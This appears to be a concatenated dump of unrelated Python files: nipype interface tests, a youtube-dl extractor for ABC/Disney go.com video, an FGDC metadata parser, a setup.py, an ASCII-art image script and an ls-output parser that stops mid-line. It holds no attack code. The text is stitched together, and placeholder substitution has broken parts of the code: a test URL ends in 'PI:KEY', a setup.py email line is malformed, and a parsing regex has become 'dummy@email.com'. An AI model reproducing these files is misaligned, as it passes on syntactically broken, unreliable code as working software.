\'input3\': True,\n \'input4\': \'some string\'}\n bif = DerivedInterface(**inputs_dict)\n bif.save_inputs_to_json(tmp_json)\n bif2 = DerivedInterface()\n bif2.load_inputs_from_json(tmp_json)\n yield assert_equal, bif2.inputs.get_traitsfree(), inputs_dict\n\n bif3 = DerivedInterface(from_file=tmp_json)\n yield assert_equal, bif3.inputs.get_traitsfree(), inputs_dict\n\n inputs_dict2 = inputs_dict.copy()\n inputs_dict2.update({\'input4\': \'some other string\'})\n bif4 = DerivedInterface(from_file=tmp_json, input4=inputs_dict2[\'input4\'])\n yield assert_equal, bif4.inputs.get_traitsfree(), inputs_dict2\n\n bif5 = DerivedInterface(input4=inputs_dict2[\'input4\'])\n bif5.load_inputs_from_json(tmp_json, overwrite=False)\n yield assert_equal, bif5.inputs.get_traitsfree(), inputs_dict2\n\n bif6 = DerivedInterface(input4=inputs_dict2[\'input4\'])\n bif6.load_inputs_from_json(tmp_json)\n yield assert_equal, bif6.inputs.get_traitsfree(), inputs_dict\n\n # test get hashval in a complex interface\n from nipype.interfaces.ants import Registration\n settings = example_data(example_data(\'smri_ants_registration_settings.json\'))\n with open(settings) as setf:\n data_dict = json.load(setf)\n\n tsthash = Registration()\n tsthash.load_inputs_from_json(settings)\n yield assert_equal, {}, check_dict(data_dict, tsthash.inputs.get_traitsfree())\n\n tsthash2 = Registration(from_file=settings)\n yield assert_equal, {}, check_dict(data_dict, tsthash2.inputs.get_traitsfree())\n\n _, hashvalue = tsthash.inputs.get_hashval(hash_method=\'timestamp\')\n yield assert_equal, \'ec5755e07287e04a4b409e03b77a517c\', hashvalue\n\ndef test_input_version():\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\', min_ver=\'0.9\')\n\n class DerivedInterface1(nib.BaseInterface):\n input_spec = InputSpec\n obj = DerivedInterface1()\n yield assert_not_raises, obj._check_version_requirements, obj.inputs\n\n config.set(\'execution\', \'stop_on_unknown_version\', True)\n yield assert_raises, Exception, obj._check_version_requirements, obj.inputs\n\n config.set_default_config()\n\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\', min_ver=\'0.9\')\n\n class DerivedInterface1(nib.BaseInterface):\n input_spec = InputSpec\n _version = \'0.8\'\n obj = DerivedInterface1()\n obj.inputs.foo = 1\n yield assert_raises, Exception, obj._check_version_requirements\n\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\', min_ver=\'0.9\')\n\n class DerivedInterface1(nib.BaseInterface):\n input_spec = InputSpec\n _version = \'0.10\'\n obj = DerivedInterface1()\n yield assert_not_raises, obj._check_version_requirements, obj.inputs\n\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\', min_ver=\'0.9\')\n\n class DerivedInterface1(nib.BaseInterface):\n input_spec = InputSpec\n _version = \'0.9\'\n obj = DerivedInterface1()\n obj.inputs.foo = 1\n not_raised = True\n yield assert_not_raises, obj._check_version_requirements, obj.inputs\n\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\', max_ver=\'0.7\')\n\n class DerivedInterface2(nib.BaseInterface):\n input_spec = InputSpec\n _version = \'0.8\'\n obj = DerivedInterface2()\n obj.inputs.foo = 1\n yield assert_raises, Exception, obj._check_version_requirements\n\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\', max_ver=\'0.9\')\n\n class DerivedInterface1(nib.BaseInterface):\n input_spec = InputSpec\n _version = \'0.9\'\n obj = DerivedInterface1()\n obj.inputs.foo = 1\n not_raised = True\n yield assert_not_raises, obj._check_version_requirements, obj.inputs\n\n\ndef test_output_version():\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\')\n\n class OutputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\', min_ver=\'0.9\')\n\n class DerivedInterface1(nib.BaseInterface):\n input_spec = InputSpec\n output_spec = OutputSpec\n _version = \'0.10\'\n obj = DerivedInterface1()\n yield assert_equal, obj._check_version_requirements(obj._outputs()), []\n\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\')\n\n class OutputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\', min_ver=\'0.11\')\n\n class DerivedInterface1(nib.BaseInterface):\n input_spec = InputSpec\n output_spec = OutputSpec\n _version = \'0.10\'\n obj = DerivedInterface1()\n yield assert_equal, obj._check_version_requirements(obj._outputs()), [\'foo\']\n\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\')\n\n class OutputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\', min_ver=\'0.11\')\n\n class DerivedInterface1(nib.BaseInterface):\n input_spec = InputSpec\n output_spec = OutputSpec\n _version = \'0.10\'\n\n def _run_interface(self, runtime):\n return runtime\n\n def _list_outputs(self):\n return {\'foo\': 1}\n obj = DerivedInterface1()\n yield assert_raises, KeyError, obj.run\n\n\ndef test_Commandline():\n yield assert_raises, Exception, nib.CommandLine\n ci = nib.CommandLine(command=\'which\')\n yield assert_equal, ci.cmd, \'which\'\n yield assert_equal, ci.inputs.args, Undefined\n ci2 = nib.CommandLine(command=\'which\', args=\'ls\')\n yield assert_equal, ci2.cmdline, \'which ls\'\n ci3 = nib.CommandLine(command=\'echo\')\n ci3.inputs.environ = {\'MYENV\': \'foo\'}\n res = ci3.run()\n yield assert_equal, res.runtime.environ[\'MYENV\'], \'foo\'\n yield assert_equal, res.outputs, None\n\n class CommandLineInputSpec1(nib.CommandLineInputSpec):\n foo = nib.Str(argstr=\'%s\', desc=\'a str\')\n goo = nib.traits.Bool(argstr=\'-g\', desc=\'a bool\', position=0)\n hoo = nib.traits.List(argstr=\'-l %s\', desc=\'a list\')\n moo = nib.traits.List(argstr=\'-i %d...\', desc=\'a repeated list\',\n position=-1)\n noo = nib.traits.Int(argstr=\'-x %d\', desc=\'an int\')\n roo = nib.traits.Str(desc=\'not on command line\')\n soo = nib.traits.Bool(argstr=""-soo"")\n nib.CommandLine.input_spec = CommandLineInputSpec1\n ci4 = nib.CommandLine(command=\'cmd\')\n ci4.inputs.foo = \'foo\'\n ci4.inputs.goo = True\n ci4.inputs.hoo = [\'a\', \'b\']\n ci4.inputs.moo = [1, 2, 3]\n ci4.inputs.noo = 0\n ci4.inputs.roo = \'hello\'\n ci4.inputs.soo = False\n cmd = ci4._parse_inputs()\n yield assert_equal, cmd[0], \'-g\'\n yield assert_equal, cmd[-1], \'-i 1 -i 2 -i 3\'\n yield assert_true, \'hello\' not in \' \'.join(cmd)\n yield assert_true, \'-soo\' not in \' \'.join(cmd)\n ci4.inputs.soo = True\n cmd = ci4._parse_inputs()\n yield assert_true, \'-soo\' in \' \'.join(cmd)\n\n class CommandLineInputSpec2(nib.CommandLineInputSpec):\n foo = nib.File(argstr=\'%s\', desc=\'a str\', genfile=True)\n nib.CommandLine.input_spec = CommandLineInputSpec2\n ci5 = nib.CommandLine(command=\'cmd\')\n yield assert_raises, NotImplementedError, ci5._parse_inputs\n\n class DerivedClass(nib.CommandLine):\n input_spec = CommandLineInputSpec2\n\n def _gen_filename(self, name):\n return \'filename\'\n\n ci6 = DerivedClass(command=\'cmd\')\n yield assert_equal, ci6._parse_inputs()[0], \'filename\'\n nib.CommandLine.input_spec = nib.CommandLineInputSpec\n\n\ndef test_Commandline_environ():\n from nipype import config\n config.set_default_config()\n ci3 = nib.CommandLine(command=\'echo\')\n res = ci3.run()\n yield assert_equal, res.runtime.environ[\'DISPLAY\'], \':1\'\n config.set(\'execution\', \'display_variable\', \':3\')\n res = ci3.run()\n yield assert_false, \'DISPLAY\' in ci3.inputs.environ\n yield assert_equal, res.runtime.environ[\'DISPLAY\'], \':3\'\n ci3.inputs.environ = {\'DISPLAY\': \':2\'}\n res = ci3.run()\n yield assert_equal, res.runtime.environ[\'DISPLAY\'], \':2\'\n\n\ndef test_CommandLine_output():\n tmp_infile = setup_file()\n tmpd, name = os.path.split(tmp_infile)\n pwd = os.getcwd()\n os.chdir(tmpd)\n yield assert_true, os.path.exists(tmp_infile)\n ci = nib.CommandLine(command=\'ls -l\')\n ci.inputs.terminal_output = \'allatonce\'\n res = ci.run()\n yield assert_equal, res.runtime.merged, \'\'\n yield assert_true, name in res.runtime.stdout\n ci = nib.CommandLine(command=\'ls -l\')\n ci.inputs.terminal_output = \'file\'\n res = ci.run()\n yield assert_true, \'stdout.nipype\' in res.runtime.stdout\n yield assert_true, isinstance(res.runtime.stdout, (str, bytes))\n ci = nib.CommandLine(command=\'ls -l\')\n ci.inputs.terminal_output = \'none\'\n res = ci.run()\n yield assert_equal, res.runtime.stdout, \'\'\n ci = nib.CommandLine(command=\'ls -l\')\n res = ci.run()\n yield assert_true, \'stdout.nipype\' in res.runtime.stdout\n os.chdir(pwd)\n teardown_file(tmpd)\n\n\ndef test_global_CommandLine_output():\n tmp_infile = setup_file()\n tmpd, name = os.path.split(tmp_infile)\n pwd = os.getcwd()\n os.chdir(tmpd)\n ci = nib.CommandLine(command=\'ls -l\')\n res = ci.run()\n yield assert_true, name in res.runtime.stdout\n yield assert_true, os.path.exists(tmp_infile)\n nib.CommandLine.set_default_terminal_output(\'allatonce\')\n ci = nib.CommandLine(command=\'ls -l\')\n res = ci.run()\n yield assert_equal, res.runtime.merged, \'\'\n yield assert_true, name in res.runtime.stdout\n nib.CommandLine.set_default_terminal_output(\'file\')\n ci = nib.CommandLine(command=\'ls -l\')\n res = ci.run()\n yield assert_true, \'stdout.nipype\' in res.runtime.stdout\n nib.CommandLine.set_default_terminal_output(\'none\')\n ci = nib.CommandLine(command=\'ls -l\')\n res = ci.run()\n yield assert_equal, res.runtime.stdout, \'\'\n os.chdir(pwd)\n teardown_file(tmpd)\n\ndef assert_not_raises(fn, *args, **kwargs):\n fn(*args, **kwargs)\n return True\n\ndef check_dict(ref_dict, tst_dict):\n """"""Compare dictionaries of inputs and and those loaded from json files""""""\n def to_list(x):\n if isinstance(x, tuple):\n x = list(x)\n\n if isinstance(x, list):\n for i, xel in enumerate(x):\n x[i] = to_list(xel)\n\n return x\n\n failed_dict = {}\n for key, value in list(ref_dict.items()):\n newval = to_list(tst_dict[key])\n if newval != value:\n failed_dict[key] = (value, newval)\n return failed_dict\n\n', '# coding: utf-8\nfrom __future__ import unicode_literals\n\nimport re\n\nfrom .adobepass import AdobePassIE\nfrom ..utils import (\n int_or_none,\n determine_ext,\n parse_age_limit,\n urlencode_postdata,\n ExtractorError,\n)\n\n\nclass GoIE(AdobePassIE):\n _SITE_INFO = {\n \'abc\': {\n \'brand\': \'001\',\n \'requestor_id\': \'ABC\',\n },\n \'freeform\': {\n \'brand\': \'002\',\n \'requestor_id\': \'ABCFamily\',\n },\n \'watchdisneychannel\': {\n \'brand\': \'004\',\n \'requestor_id\': \'Disney\',\n },\n \'watchdisneyjunior\': {\n \'brand\': \'008\',\n \'requestor_id\': \'DisneyJunior\',\n },\n \'watchdisneyxd\': {\n \'brand\': \'009\',\n \'requestor_id\': \'DisneyXD\',\n }\n }\n _VALID_URL = r\'https?://(?:(?P%s)\\.)?go\\.com/(?:[^/]+/)*(?:vdka(?P\\w+)|season-\\d+/\\d+-(?P[^/?#]+))\' % \'|\'.join(_SITE_INFO.keys())\n _TESTS = [{\n \'url\': \'http://abc.go.PI:KEY\',\n \'info_dict\': {\n \'id\': \'0_g86w5onx\',\n \'ext\': \'mp4\',\n \'title\': \'Sneak Peek: Language Arts\',\n \'description\': \'PI:KEY\',\n },\n \'params\': {\n # m3u8 download\n \'skip_download\': True,\n },\n }, {\n \'url\': \'http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601\',\n \'only_matching\': True,\n }]\n\n def _real_extract(self, url):\n sub_domain, video_id, display_id = re.match(self._VALID_URL, url).groups()\n if not video_id:\n webpage = self._download_webpage(url, display_id)\n video_id = self._search_regex(\n # There may be inner quotes, e.g. data-video-id=""\'VDKA3609139\'""\n # from http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood\n r\'data-video-id=[""\\\']*VDKA(\\w+)\', webpage, \'video id\')\n site_info = self._SITE_INFO[sub_domain]\n brand = site_info[\'brand\']\n video_data = self._download_json(\n \'http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json\' % (brand, video_id),\n video_id)[\'video\'][0]\n title = video_data[\'title\']\n\n formats = []\n for asset in video_data.get(\'assets\', {}).get(\'asset\', []):\n asset_url = asset.get(\'value\')\n if not asset_url:\n continue\n format_id = asset.get(\'format\')\n ext = determine_ext(asset_url)\n if ext == \'m3u8\':\n video_type = video_data.get(\'type\')\n data = {\n \'video_id\': video_data[\'id\'],\n \'video_type\': video_type,\n \'brand\': brand,\n \'device\': \'001\',\n }\n if video_data.get(\'accesslevel\') == \'1\':\n requestor_id = site_info[\'requestor_id\']\n resource = self._get_mvpd_resource(\n requestor_id, title, video_id, None)\n auth = self._extract_mvpd_auth(\n url, video_id, requestor_id, resource)\n data.update({\n \'token\': auth,\n \'token_type\': \'ap\',\n \'adobe_requestor_id\': requestor_id,\n })\n else:\n self._initialize_geo_bypass([\'US\'])\n entitlement = self._download_json(\n \'https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json\',\n video_id, data=urlencode_postdata(data), headers=self.geo_verification_headers())\n errors = entitlement.get(\'errors\', {}).get(\'errors\', [])\n if errors:\n for error in errors:\n if error.get(\'code\') == 1002:\n self.raise_geo_restricted(\n error[\'message\'], countries=[\'US\'])\n error_message = \', \'.join([error[\'message\'] for error in errors])\n raise ExtractorError(\'%s said: %s\' % (self.IE_NAME, error_message), expected=True)\n asset_url += \'?\' + entitlement[\'uplynkData\'][\'sessionKey\']\n formats.extend(self._extract_m3u8_formats(\n asset_url, video_id, \'mp4\', m3u8_id=format_id or \'hls\', fatal=False))\n else:\n f = {\n \'format_id\': format_id,\n \'url\': asset_url,\n \'ext\': ext,\n }\n if re.search(r\'(?:/mp4/source/|_source\\.mp4)\', asset_url):\n f.update({\n \'format_id\': (\'%s-\' % format_id if format_id else \'\') + \'SOURCE\',\n \'preference\': 1,\n })\n else:\n mobj = re.search(r\'/(\\d+)x(\\d+)/\', asset_url)\n if mobj:\n height = int(mobj.group(2))\n f.update({\n \'format_id\': (\'%s-\' % format_id if format_id else \'\') + \'%dP\' % height,\n \'width\': int(mobj.group(1)),\n \'height\': height,\n })\n formats.append(f)\n self._sort_formats(formats)\n\n subtitles = {}\n for cc in video_data.get(\'closedcaption\', {}).get(\'src\', []):\n cc_url = cc.get(\'value\')\n if not cc_url:\n continue\n ext = determine_ext(cc_url)\n if ext == \'xml\':\n ext = \'ttml\'\n subtitles.setdefault(cc.get(\'lang\'), []).append({\n \'url\': cc_url,\n \'ext\': ext,\n })\n\n thumbnails = []\n for thumbnail in video_data.get(\'thumbnails\', {}).get(\'thumbnail\', []):\n thumbnail_url = thumbnail.get(\'value\')\n if not thumbnail_url:\n continue\n thumbnails.append({\n \'url\': thumbnail_url,\n \'width\': int_or_none(thumbnail.get(\'width\')),\n \'height\': int_or_none(thumbnail.get(\'height\')),\n })\n\n return {\n \'id\': video_id,\n \'title\': title,\n \'description\': video_data.get(\'longdescription\') or video_data.get(\'description\'),\n \'duration\': int_or_none(video_data.get(\'duration\', {}).get(\'value\'), 1000),\n \'age_limit\': parse_age_limit(video_data.get(\'tvrating\', {}).get(\'rating\')),\n \'episode_number\': int_or_none(video_data.get(\'episodenumber\')),\n \'series\': video_data.get(\'show\', {}).get(\'title\'),\n \'season_number\': int_or_none(video_data.get(\'season\', {}).get(\'num\')),\n \'thumbnails\': thumbnails,\n \'formats\': formats,\n \'subtitles\': subtitles,\n }\n', '# -*- coding: ISO-8859-15 -*-\n# =============================================================================\n# Copyright (c) 2010 Tom Kralidis\n#\n# Authors : Tom Kralidis dummy@email.com\n#\n# Contact email: dummy@email.com\n# =============================================================================\n\n"""""" FGDC metadata parser """"""\n\nfrom __future__ import (absolute_import, division, print_function)\n\nfrom owscapable.etree import etree\nfrom owscapable import util\n\nclass Metadata(object):\n """""" Process metadata """"""\n def __init__(self, md):\n if hasattr(md, \'getroot\'): # standalone document\n self.xml = etree.tostring(md.getroot())\n else: # part of a larger document\n self.xml = etree.tostring(md)\n\n self.idinfo = Idinfo(md)\n self.eainfo = Eainfo(md)\n self.distinfo = Distinfo(md)\n self.metainfo = Metainfo(md)\n\n if self.idinfo.datasetid:\n self.identifier = self.idinfo.datasetid\n\nclass Idinfo(object):\n """""" Process idinfo """"""\n def __init__(self, md):\n val = md.find(\'idinfo/datasetid\')\n self.datasetid = util.testXMLValue(val)\n\n val = md.find(\'idinfo/citation\')\n self.citation = Citation(val)\n\n val = md.find(\'idinfo/descript\')\n if val is not None:\n self.descript = Descript(val)\n\n val = md.find(\'idinfo/timeperd\')\n self.timeperd = Timeperd(val)\n\n val = md.find(\'idinfo/status\')\n if val is not None:\n self.status = Status(val)\n\n val = md.find(\'idinfo/spdom\')\n if val is not None:\n self.spdom = Spdom(val)\n\n val = md.find(\'idinfo/keywords\')\n if val is not None:\n self.keywords = Keywords(val)\n\n val = md.find(\'idinfo/accconst\')\n self.accconst = util.testXMLValue(val)\n\n val = md.find(\'idinfo/useconst\')\n self.useconst = util.testXMLValue(val)\n\n val = md.find(\'idinfo/ptcontac\')\n if val is not None:\n self.ptcontac = Ptcontac(val)\n\n val = md.find(\'idinfo/datacred\')\n self.datacred = util.testXMLValue(val)\n\n val = md.find(\'idinfo/crossref\')\n self.crossref = Citation(val)\n\nclass Citation(object):\n """""" Process citation """"""\n def __init__(self, md):\n if md is not None:\n self.citeinfo = {}\n \n val = md.find(\'citeinfo/origin\')\n self.citeinfo[\'origin\'] = util.testXMLValue(val)\n \n val = md.find(\'citeinfo/pubdate\')\n self.citeinfo[\'pubdate\'] = util.testXMLValue(val)\n \n val = md.find(\'citeinfo/title\')\n self.citeinfo[\'title\'] = util.testXMLValue(val)\n \n val = md.find(\'citeinfo/geoform\')\n self.citeinfo[\'geoform\'] = util.testXMLValue(val)\n \n val = md.find(\'citeinfo/pubinfo/pubplace\')\n self.citeinfo[\'pubplace\'] = util.testXMLValue(val)\n \n val = md.find(\'citeinfo/pubinfo/publish\')\n self.citeinfo[\'publish\'] = util.testXMLValue(val)\n\n self.citeinfo[\'onlink\'] = []\n for link in md.findall(\'citeinfo/onlink\'):\n self.citeinfo[\'onlink\'].append(util.testXMLValue(link))\n\nclass Descript(object):\n """""" Process descript """"""\n def __init__(self, md):\n val = md.find(\'abstract\')\n self.abstract = util.testXMLValue(val)\n \n val = md.find(\'purpose\')\n self.purpose = util.testXMLValue(val)\n\n val = md.find(\'supplinf\')\n self.supplinf = util.testXMLValue(val)\n\nclass Timeperd(object):\n """""" Process timeperd """"""\n def __init__(self, md):\n if md is not None:\n val = md.find(\'current\')\n self.current = util.testXMLValue(val)\n\n val = md.find(\'timeinfo\')\n if val is not None:\n self.timeinfo = Timeinfo(val)\n\nclass Timeinfo(object):\n """""" Process timeinfo """"""\n def __init__(self, md):\n val = md.find(\'sngdate\')\n if val is not None:\n self.sngdate = Sngdate(val)\n\n val = md.find(\'rngdates\')\n if val is not None:\n self.rngdates = Rngdates(val)\n\nclass Sngdate(object):\n """""" Process sngdate """"""\n def __init__(self, md):\n val = md.find(\'caldate\')\n self.caldate = util.testXMLValue(val)\n val = md.find(\'time\')\n self.time = util.testXMLValue(val)\n\nclass Rngdates(object):\n """""" Process rngdates """"""\n def __init__(self, md):\n val = md.find(\'begdate\')\n self.begdate = util.testXMLValue(val)\n val = md.find(\'begtime\')\n self.begtime = util.testXMLValue(val)\n val = md.find(\'enddate\')\n self.enddate = util.testXMLValue(val)\n val = md.find(\'endtime\')\n self.endtime = util.testXMLValue(val)\n\nclass Status(object):\n """""" Process status """"""\n def __init__(self, md):\n val = md.find(\'progress\')\n self.progress = util.testXMLValue(val)\n\n val = md.find(\'update\')\n self.update = util.testXMLValue(val)\n\nclass Spdom(object):\n """""" Process spdom """"""\n def __init__(self, md):\n val = md.find(\'bounding/westbc\')\n self.westbc = util.testXMLValue(val)\n\n val = md.find(\'bounding/eastbc\')\n self.eastbc = util.testXMLValue(val)\n \n val = md.find(\'bounding/northbc\')\n self.northbc = util.testXMLValue(val)\n\n val = md.find(\'bounding/southbc\')\n self.southbc = util.testXMLValue(val)\n\n if (self.southbc is not None and self.northbc is not None and\n self.eastbc is not None and self.westbc is not None):\n self.bbox = Bbox(self)\n\nclass Bbox(object):\n """""" Generate bbox for spdom (convenience function) """"""\n def __init__(self, spdom):\n self.minx = spdom.westbc\n self.miny = spdom.southbc\n self.maxx = spdom.eastbc\n self.maxy = spdom.northbc\n\nclass Keywords(object):\n """""" Process keywords """"""\n def __init__(self, md):\n self.theme = []\n self.place = []\n self.temporal = []\n\n for i in md.findall(\'theme\'):\n theme = {}\n val = i.find(\'themekt\')\n theme[\'themekt\'] = util.testXMLValue(val)\n theme[\'themekey\'] = []\n for j in i.findall(\'themekey\'):\n themekey = util.testXMLValue(j)\n if themekey is not None:\n theme[\'themekey\'].append(themekey)\n self.theme.append(theme)\n\n for i in md.findall(\'place\'):\n theme = {}\n place = {}\n val = i.find(\'placekt\')\n theme[\'placekt\'] = util.testXMLValue(val)\n theme[\'placekey\'] = []\n for j in i.findall(\'placekey\'):\n theme[\'placekey\'].append(util.testXMLValue(j))\n self.place.append(place)\n\n for i in md.findall(\'temporal\'):\n theme = {}\n temporal = {}\n val = i.find(\'tempkt\')\n theme[\'tempkt\'] = util.testXMLValue(val)\n theme[\'tempkey\'] = []\n for j in i.findall(\'tempkey\'):\n theme[\'tempkey\'].append(util.testXMLValue(j))\n self.temporal.append(temporal)\n\nclass Ptcontac(object):\n """""" Process ptcontac """"""\n def __init__(self, md):\n val = md.find(\'cntinfo/cntorgp/cntorg\')\n self.cntorg = util.testXMLValue(val) \n\n val = md.find(\'cntinfo/cntorgp/cntper\')\n self.cntper = util.testXMLValue(val) \n\n val = md.find(\'cntinfo/cntpos\')\n self.cntpos = util.testXMLValue(val) \n\n val = md.find(\'cntinfo/cntaddr/addrtype\')\n self.addrtype = util.testXMLValue(val)\n\n val = md.find(\'cntinfo/cntaddr/address\')\n self.address = util.testXMLValue(val)\n\n val = md.find(\'cntinfo/cntaddr/city\')\n self.city = util.testXMLValue(val)\n\n val = md.find(\'cntinfo/cntaddr/state\')\n self.state = util.testXMLValue(val)\n\n val = md.find(\'cntinfo/cntaddr/postal\')\n self.postal = util.testXMLValue(val)\n\n val = md.find(\'cntinfo/cntaddr/country\')\n self.country = util.testXMLValue(val)\n\n val = md.find(\'cntinfo/cntvoice\')\n self.voice = util.testXMLValue(val)\n\n val = md.find(\'cntinfo/cntemail\')\n self.email = util.testXMLValue(val)\n\nclass Eainfo(object):\n """""" Process eainfo """"""\n def __init__(self, md):\n val = md.find(\'eainfo/detailed/enttyp/enttypl\')\n self.enttypl = util.testXMLValue(val)\n\n val = md.find(\'eainfo/detailed/enttyp/enttypd\')\n self.enttypd = util.testXMLValue(val)\n\n val = md.find(\'eainfo/detailed/enttyp/enttypds\')\n self.enttypds = util.testXMLValue(val)\n\n self.attr = []\n for i in md.findall(\'eainfo/detailed/attr\'):\n attr = {}\n val = i.find(\'attrlabl\')\n attr[\'attrlabl\'] = util.testXMLValue(val)\n\n val = i.find(\'attrdef\')\n attr[\'attrdef\'] = util.testXMLValue(val)\n\n val = i.find(\'attrdefs\')\n attr[\'attrdefs\'] = util.testXMLValue(val)\n\n val = i.find(\'attrdomv/udom\')\n attr[\'udom\'] = util.testXMLValue(val)\n\n self.attr.append(attr)\n\nclass Distinfo(object):\n """""" Process distinfo """"""\n def __init__(self, md):\n val = md.find(\'distinfo\')\n if val is not None:\n val2 = val.find(\'stdorder\')\n if val2 is not None:\n self.stdorder = {\'digform\': []}\n for link in val2.findall(\'digform\'):\n digform = {}\n digform[\'name\'] = util.testXMLValue(link.find(\'digtinfo/formname\'))\n digform[\'url\'] = util.testXMLValue(link.find(\'digtopt/onlinopt/computer/networka/networkr/\'))\n self.stdorder[\'digform\'].append(digform)\n\nclass Metainfo(object):\n """""" Process metainfo """"""\n def __init__(self, md):\n val = md.find(\'metainfo/metd\')\n self.metd = util.testXMLValue(val)\n\n val = md.find(\'metainfo/metrd\')\n self.metrd = util.testXMLValue(val)\n\n val = md.find(\'metainfo/metc\') \n if val is not None:\n self.metc = Ptcontac(val)\n\n val = md.find(\'metainfo/metstdn\')\n self.metstdn = util.testXMLValue(val)\n\n val = md.find(\'metainfo/metstdv\')\n self.metstdv = util.testXMLValue(val)\n\n val = md.find(\'metainfo/metac\')\n self.metac = util.testXMLValue(val)\n\n val = md.find(\'metainfo/metuc\')\n self.metuc = util.testXMLValue(val)\n', 'import sys\nfrom setuptools import setup\n\ntests_require = [""nose>=1.0""]\nif sys.version_info < (3,0):\n tests_require = [""nose>=1.0"", ""mock""]\n\nsetup(\n name=""unitils"",\n version=""0.1.2"",\n author=""iLoveTux"",\n dummy@email.com"",\n description=""Cross platform utilities I have found to be incredibly useful"",\n license=""GPLv3"",\n keywords=""utility tools cli"",\n url=""http://github.com/ilovetux/unitils"",\n packages=[\'unitils\'],\n install_requires=[""colorama""],\n entry_points={\n ""console_scripts"": [\n ""cat.py=unitils.cli:cat"",\n ""cp.py=unitils.cli:cp"",\n ""find.py=unitils.cli:find"",\n ""grep.py=unitils.cli:grep"",\n ""head.py=unitils.cli:head"",\n ""ls.py=unitils.cli:ls"",\n ""mv.py=unitils.cli:mv"",\n ""watch.py=unitils.cli:watch"",\n ""wc.py=unitils.cli:wc"",\n ""which.py=unitils.cli:which"",\n ]\n },\n test_suite=""nose.collector"",\n tests_require=tests_require,\n classifiers=[\n ""Development Status :: 4 - Beta"",\n ""Topic :: Utilities"",\n ""License :: OSI Approved :: GNU General Public License v3 (GPLv3)"",\n ],\n)\n', '#!/usr/bin/env python\n\n# asciinator.py\n# \n# Copyright 2014 Christian Diener dummy@email.com\n# \n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n# \n# \n\nfrom __future__ import print_function\t\t# for python2 compat\n\nimport sys; \nfrom PIL import Image; \nimport numpy as np\n\n# ascii chars sorted by ""density""\nchars = np.asarray(list(\' .,:;irsXA253hMHGS#9B&@\'))\n\n# check command line arguments\nif len(sys.argv) != 4: \n\tprint( \'Usage: asciinator.py image scale factor\' )\n\tsys.exit()\n\n# set basic program parameters \n# f = filename, SC = scale, GCF = gamma correction factor, WCF = width correction factor\t\nf, SC, GCF, WCF = sys.argv[1], float(sys.argv[2]), float(sys.argv[3]), 7.0/4.0\n\n# open, scale and normalize image by pixel intensities\nimg = Image.open(f)\nS = (int(img.size[0]*SC*WCF), int(img.size[1]*SC))\nimg = np.sum( np.asarray(img.resize(S), dtype=""float""), axis=2)\nimg -= img.min()\nimg = (1.0 - img/img.max())**GCF*(chars.size-1)\n\n# Assemble and print ascii art\nprint( ""\\n"".join(("""".join(r) for r in chars[img.astype(int)])))\nprint()\n', '#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nimport datetime\nfrom time import strptime\nimport re\nimport os\nimport json\n\nclass FileStatus(object):\n def __init__(self, path, rights, nbFiles, owner, group, size, date, relpath = None):\n self.path = path\n\n self.rights = rights\n self.nbFiles = nbFiles\n self.owner = owner\n self.group = group\n\n self.size = size\n\n self.date = date\n self.relpath = relpath\n\n def __eq__(self, other):\n return (self.path == other.path and self.rights == other.rights and\n self.nbFiles == other.nbFiles and self.owner == other.owner and self.group == other.group and\n self.size == other.size and self.date == other.date)\n\n def is_dir(self):\n return self.rights.startswith(""d"")\n\n def __str__(self):\n return self.to_str(0, 0, 0, 0, 0, 0, 0)\n\n def to_str(self, rights_width, nbFiles_width, owner_width, group_width, size_width, date_width, path_with):\n\tif self.is_dir:\n nb_files = ""-""\n\telse:\n nb_files = str(self.nbFiles)\n result = ""%s %s %s %s %s %s %s"" % (self.rights.ljust(rights_width),\n nb_files.ljust(nbFiles_width),\n self.owner.ljust(owner_width),\n self.group.ljust(group_width),\n str(self.size).ljust(size_width),\n self.date.strftime(""%Y-%M-%d %H:%M"").ljust(date_width),\n self.path.ljust(path_with))\n return result.encode(""utf-8"")\n\ndef get_file_statuses_pretty_print(file_statuses):\n rights_width = 0\n nb_files_width = 0\n owner_width = 0\n group_width = 0\n size_width = 0\n date_width = 0\n path_width = 0\n\t\n if len(file_statuses) != 0:\t\n rights_width = max([len(fs.rights) for fs in file_statuses])\n nb_files_width = max([len(str(fs.nbFiles)) for fs in file_statuses])\n owner_width = max([len(fs.owner) for fs in file_statuses])\n group_width = max([len(fs.group) for fs in file_statuses])\n size_width = max([len(str(fs.size)) for fs in file_statuses])\n date_width = max([len(fs.date.strftime(""%Y-%M-%d %H:%M"")) for fs in file_statuses])\n path_width = max([len(fs.path) for fs in file_statuses])\n\n result = []\n for file_status in file_statuses:\n result.append(file_status.to_str(rights_width, nb_files_width, owner_width, group_width, size_width, date_width, path_width))\n return ""\\n"".join(result)\n\nclass LsParser(object):\n def __init__(self):\n pass\n\n def parse_line(self, line):\n regex = ""^(dummy@email.com)$""\n\n m = re.match(regex, line, 